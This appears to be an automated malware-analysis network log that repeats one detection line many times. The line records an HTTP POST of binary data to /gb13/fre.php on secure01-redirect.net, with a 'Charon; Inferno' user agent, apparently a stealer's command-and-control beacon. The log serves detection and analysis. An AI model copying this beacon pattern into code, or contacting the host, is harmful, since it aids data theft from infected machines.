    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
    Source: global trafficHTTP traffic detected: POST /gb13/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F810C324Content-Length: 151Connection: close
